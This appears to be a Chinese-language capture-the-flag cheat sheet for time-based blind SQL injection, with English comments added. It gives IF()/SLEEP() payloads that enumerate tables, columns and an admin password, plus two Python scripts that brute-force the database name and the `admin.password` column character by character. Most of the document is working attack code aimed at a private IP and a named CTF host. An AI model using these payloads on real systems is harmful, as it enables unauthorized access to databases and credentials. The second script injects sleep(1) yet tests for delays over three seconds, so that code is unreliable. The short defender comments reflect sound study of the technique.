一、语句
测试语句:
if(ascii(mid(1,1,1))like(49),sleep(3),1)
1、表:
if(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database()))),1,1))like(97),sleep(30),1)
2、列:
if(ascii(mid((select(group_concat(column_name))from(information_schema.columns)where((table_name)like(0x61646d696e))),1,1))like(105),sleep(30),1)
3、字段:
if(ascii(mid((select(group_concat(password))from(admin)),1,1))like(55),sleep(30),1)
二、爆破数据库脚本
# Time-based blind SQL injection probe as written on this page: it recovers
# the current database name one character at a time by measuring how long
# the target takes to answer a GET whose `id` parameter carries an IF()/SLEEP()
# expression. (Indentation reconstructed from the whitespace-mangled paste.)
import requests
from time import sleep  # unused here: the only sleep() is the one inside the SQL string
url = "http://192.168.8.148/sql.php?id="
# i = 1-based character position inside database(); j = candidate ASCII code (32..127).
for i in range(1, 100):
    for j in range(32, 128):
        # MySQL IF(): the server is asked to sleep(3) only when the character at
        # position i has ASCII code j; otherwise the expression evaluates to 1.
        payload = "if(ascii(mid((select(database()))," + str(i) + ",1))like(" + str(j) + "),sleep(3),1)"
        # Payload is appended verbatim to the query string (no URL encoding).
        res = requests.get(url+payload)
        # Client-side round-trip above 3 s is taken as "match" -- the timing oracle.
        # Defender's view: this shows up server-side as a burst of requests to one
        # endpoint with sleep()/if()/mid() in the query string plus a handful of
        # anomalously slow responses; binding `id` as a parameter removes the oracle.
        if res.elapsed.total_seconds() > 3:
            print(chr(j), end='')  # one recovered character, no newline
            break                  # next position
# A position with no match prints nothing and the outer loop just moves on;
# there is no stop condition other than exhausting i.
# Bare module-level string literal holding the alternative payload templates
# the author used with the loop above; it is never executed.
'''
数据库
if(ascii(mid((select(database()))," + str(i) + ",1))like(" + str(j) + "),sleep(3),1)
表名
if(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database())))," + str(i) + ",1))like(" + str(j) + "),sleep(3),1)
字段名
if(ascii(mid((select(group_concat(column_name))from(information_schema.columns)where((table_name)like(\"test_sql\")))," + str(i) + ",1))like(" + str(j) + "),sleep(3),1)
'''
三、跑密码的脚本
# Second time-based blind SQLi script on this page: same timing-oracle idea as
# the one above, aimed at the concatenated `password` column of table `admin`.
# (Indentation reconstructed from the whitespace-mangled paste.)
import requests
from time import sleep  # unused here: the only sleep() is the one inside the SQL string
url = "http://ctf1-1.anfu.hillstonenet.com:8081/single.php?id="
# i = 1-based character position (1..32); j = candidate ASCII code (47..127).
for i in range(1, 33):
    for j in range(47, 128):
        # Candidate set is narrowed to '0'-'9' (48..57) and 'a'-'z' (97..122).
        if(47<j<58 or 96<j<123):
            # MySQL IF(): the server is asked to sleep(1) only when the character
            # at position i has ASCII code j; otherwise the expression evaluates to 1.
            d = "if(ascii(mid((select(group_concat(password))from(admin))," + str(i) + ",1))like(" + str(j) + "),sleep(1),1)"
            r = requests.get(url + d)
            # A response slower than 3 s (measured client-side) is treated as a match.
            # Defender's view: stored credentials should be salted hashes, and the
            # `id` parameter should be bound, not interpolated -- both remove what
            # this loop depends on.
            if r.elapsed.total_seconds() > 3:
                print(chr(j))  # one recovered character per line
                break          # next position